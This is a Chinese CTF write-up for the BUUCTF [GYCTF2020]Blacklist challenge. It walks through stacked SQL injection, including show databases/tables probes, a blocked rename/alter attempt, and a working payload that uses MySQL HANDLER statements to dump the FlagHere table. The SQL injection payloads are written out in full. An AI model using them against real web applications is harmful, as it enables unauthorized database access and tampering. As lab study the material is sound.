练习8 Web [GYCTF2020]Blacklist

这道题其实不是堆叠注入,但是我在联合查询无效后,试了一下堆叠,最后一步发现被过滤的sql语句太多了,完全没法

查阅其他wp的过程GYCTF2020Blacklist 1(详细做题过程)

是用的handler语句,只能用于MySQL中,是类似于select的语句,详细内容我记录在我的wp中

先输入一些常规数字或者字母字符

返回值:

  • 数字:1
php 复制代码
array(2) {
  [0]=>
  string(1) "1"
  [1]=>
  string(7) "hahahah"
}
  • 数字:2
php 复制代码
 array(2) {
  [0]=>
  string(1) "2"
  [1]=>
  string(12) "miaomiaomiao"
}

其他字符均没有返回值

尝试常见的sql语句,发现返回如下内容,查询后发现是提示这些sql语句都被过滤掉了

在博客https://blog.csdn.net/weixin_45551083/article/details/105389126 中提到了"堆叠注入"

堆叠注入详解

堆叠注入是用 ; 分隔开的多行sql语句

sql 复制代码
?inject=2';show databases;#

得到以下内容

继续 show tables

找到一个"FlagHere"表

查找"FlagHere"下面的所有列元素:看到一个字符串flag 后面还有一个varchar(100)

应该是要想办法打印出来

到这里思路确实会卡住
再次看堆叠注入的特点,sql语句是各自执行的

查找"words"下面的所有列元素:
会发现刚好是 一个int和一个varchar(20)
对应一开始我们输入数字1或者2的"一个数字+一个字符串"的格式

再下一步的思路是既然默认查询到的是显示"word"这张表
那么,就把word表名替换到FlagHere,同时列名也同步替换
这样FlagHere里的内容不就默认打印出来了

依次将words表改名为noWords

FlagHere改名为words

然后将此时的words表中的列名flag改为id,与原来的words表中列名第一个为id第二个为No一一对应

sql 复制代码
?inject=2';
rename table `words` to `noWords`; 
rename table `FlagHere` to `words`;
alter table `words` change `flag`  `id` varchar(100);#

提交发现alter也被过滤了,服了

直接查这道题的wp,开头的链接GYCTF2020Blacklist 1(详细做题过程)

又是新东西

Handler语法

handler语句,一行一行的浏览一个表中的数据

handler语句并不具备select语句的所有功能。

mysql专用的语句,并没有包含到SQL标准中。

HANDLER语句提供通往表的直接通道的存储引擎接口,可以用于MyISAM和InnoDB表。

sql 复制代码
> 1、HANDLER tbl_name OPEN

打开一张表,无返回结果,实际上我们在这里声明了一个名为tb1_name的句柄。

2、HANDLER tbl_name READ FIRST

获取句柄的第一行,通过READ NEXT依次获取其它行。最后一行执行之后再执行NEXT会返回一个空的结果。

sql 复制代码
> 3、HANDLER tbl_name CLOSE

关闭打开的句柄。

sql 复制代码
> 4、HANDLER tbl_name READ index_name = value

通过索引列指定一个值,可以指定从哪一行开始,通过NEXT继续浏览。

直接用handler语法打印之前查到的FlagHere表,输出内容就行

http://6e7bc099-1e40-424e-9cc5-235785f06b8b.node5.buuoj.cn:81/?inject=2';handler FlagHere open;handler FlagHere read first;handler FlagHere close;#

相关推荐
欢呼的太阳41 分钟前
数据库设计Step by Step (10)——范式化
服务器·数据库·oracle
喜欢的名字被抢了2 小时前
MySQL基础入门:从零理解数据库与SQL
数据库·mysql·教程
Elastic 中国社区官方博客3 小时前
如何比较两个 Elasticsearch 索引并找出缺失的文档
大数据·运维·数据库·elasticsearch·搜索引擎
DLYSB_3 小时前
生命通道:如何用 HIS 医疗系统直连网络声光终端,打造“零延误”的危急值响应网关?
java·网络·数据库·报警灯
儒雅的大叔3 小时前
MySQL数据库InnoDB数据恢复工具使用总结
数据库·mysql·adb
观远数据4 小时前
ChatBI选型对比:从意图识别到SQL修复,六个维度打分决定是否值得投产
数据库·人工智能·sql
嘉&年华4 小时前
【第008篇】通过dexp和dimp命令导出和导入dmp文件(适用于达梦数据库)
数据库·sql
哥是强混5 小时前
Means:基于 .NET 10 打造的开源自部署 S3 兼容对象存储服务
网络·数据库·.net
ffqws_5 小时前
redis面试:如何保证双写一致
数据库·redis·缓存
水无痕simon6 小时前
6 数据库同义词
数据库